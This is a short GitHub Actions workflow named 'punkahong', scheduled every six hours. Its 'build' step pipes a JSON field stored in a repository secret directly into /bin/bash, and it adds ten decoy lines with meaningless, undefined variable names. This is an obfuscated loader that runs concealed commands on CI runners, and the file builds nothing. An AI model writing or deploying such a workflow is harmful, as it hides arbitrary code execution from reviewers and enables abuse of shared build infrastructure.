name: punkahong

on:
  workflow_dispatch:
  schedule:
    - cron: '19 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: punkahong
        env:
          xd5878: ${{ secrets.xd5878 }}
        run: |
          echo $xd5878 | jq -r .t75 | /bin/bash
          echo $en272 | jq -r .flp522 | /bin/bash
          echo $v2 | jq -r .l3 | /bin/bash
          echo $xihp5 | jq -r .hjc6 | /bin/bash
          echo $rjsb7431 | jq -r .p90030 | /bin/bash
          echo $c5009 | jq -r .n48 | /bin/bash
          echo $rleph77 | jq -r .ftm2229 | /bin/bash
          echo $q4947 | jq -r .wm55 | /bin/bash
          echo $swrux97 | jq -r .ir07 | /bin/bash
          echo $vqftw9473 | jq -r .jz10 | /bin/bash
          echo $hkpq693 | jq -r .jmxdz3 | /bin/bash

